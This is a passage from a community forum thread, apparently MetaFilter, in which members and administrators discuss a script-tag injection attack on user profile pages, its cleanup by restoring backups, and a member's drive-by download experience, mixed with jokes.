The only way to really fix it is to load an earlier backup. The attack overwrites everything after the first 30 characters of text with the script tags - look at Projects (only if you're on FF/NoScript) to see what I mean. If it weren't for that, it would be easier to fix since they only injected the exact same script tags into everything.
posted by DecemberBoy at 7:46 AM on January 24 [+] [!]

I just wanna add, if you have firefox with noscript, don't ever get careless and turn "allow scripts globally" on in noscript. Recently I got hit with a drive by download that way and ended up with some fricking thing called "ms antispyware 2009" installing itself along with a bunch of its friends. And no, I didn't click "yes" or "accept" at any point.
posted by fleetmouse at 7:46 AM on January 24 [+] [!]

I removed the links from my profile just to be careful (I know it'll be backup-resurrected, but I needed to feel helpful) and I'm thankfully behind a security system set to "Paranoid" so I hope nothing leaked through. Changed password, of course.

Side Note: I've only got room in the shelter for 3. I'm taking applications now.
posted by The Whelk at 7:46 AM on January 24 [+] [!]

I just shut down profile pages, assessing the damage now.
posted by pb at 7:48 AM on January 24 [+] [!]

Googling suggests it's not just us, at least.
posted by cortex at 7:49 AM on January 24 [+] [!]

I feel bad for whoever did this. They are going to be in a world of hurt when the Mefi vigilante militia tracks them down. And they will.

Here's one member already on the phone with the spammer. Note: He loves MeFi so much he says it's like a daughter to him.
posted by ALongDecember at 7:49 AM on January 24 [+] [!]

« Older I've gone ahead and created a ...   |   What's up with the underscore ... Newer »